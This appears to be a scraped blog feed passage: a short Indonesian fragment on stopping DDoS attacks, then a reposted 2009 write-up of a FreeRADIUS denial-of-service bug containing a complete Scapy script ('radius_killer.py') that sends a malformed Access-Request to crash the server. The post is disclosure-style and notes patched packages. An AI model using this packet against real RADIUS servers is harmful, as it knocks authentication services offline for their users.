berbagai alamat IP secara berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan oleh system yang sudah terkena serangan sangat parah).
]]> http://www.kukukakikukakukaku.com/cracker-attack.sonk/feed 2 http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk#comments Wed, 21 Oct 2009 02:59:50 +0000 bento http://www.kukukakikukakukaku.com/?p=31 I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:
import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius
Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:
#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr
if len(sys.argv) != 2:
print “Usage: radius_killer.py \n”
sys.exit(1)
PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \
RadiusAttr(type=69,value=”",len=2)
send(PoD)

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust. Correct me if I’m wrong. Either way, updated packages are available.

source : www.braindeadprojects.com